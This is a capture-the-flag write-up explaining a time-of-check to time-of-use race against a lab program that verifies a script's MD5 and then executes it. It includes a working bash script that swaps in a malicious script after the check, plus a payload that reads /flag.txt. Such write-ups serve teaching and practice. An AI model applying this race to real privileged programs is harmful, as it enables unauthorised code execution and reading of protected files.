1.0 KiB
1.0 KiB
Hack the Jail - Part 2
Difficulty
Hard.
How To solve
The key insight of this challenge is that the file is opened twice: once for checking whether the MD5sum matches the expected value, and the second time for actually executing the file.
This type of vulnerabity is called a "Time-of-check to time-of-use" or in short a TOCTTOU attack. The challenge contains an artificially long timeout to be able to exploit this vulnerabity more easily.
The script below performs the actual attack:
#!/bin/bash
# run the vulnerable program in the backgrouncd
./execute &
# make sure that the check has been performed
sleep 1
# then replace the program with our malicious program
mv hello_world.sh hello_world.sh.old
cp read.sh hello_world.sh
# wait until the "execute" program has finished.
sleep 8
# clean up
rm hello_world.sh
mv hello_world.sh.old hello_world.sh
The contents of the read.sh file are as follows:
#!/bin/bash
cat /flag.txt
Both files need to have executable permissions which can be obtained using chmod +x *.sh.